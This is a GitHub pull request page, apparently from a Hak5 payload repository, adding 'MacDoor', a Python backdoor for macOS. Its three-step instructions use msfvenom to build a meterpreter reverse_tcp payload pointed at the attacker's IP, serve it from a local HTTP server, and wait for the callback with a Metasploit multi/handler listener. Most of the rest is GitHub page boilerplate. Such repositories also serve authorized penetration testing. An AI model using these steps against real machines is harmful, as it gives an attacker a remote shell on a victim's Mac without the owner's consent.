Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create MacDoor - A Python Backdoor for MacOS #662

Merged
merged 5 commits into from
Aug 30, 2023
Merged

Conversation

afsh4ck
Copy link
Contributor

@afsh4ck afsh4ck commented Aug 30, 2023

Instructions:

  • Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
  • Step 2: mount a local server 'python3 -m http.server'
  • Step 3: msfconsole multi/handler listener open before the attack.

@hak5darren hak5darren merged commit 5ec9376 into hak5:master Aug 30, 2023
dallaswinger added a commit that referenced this pull request Sep 18, 2023
@dallaswinger dallaswinger mentioned this pull request Sep 18, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants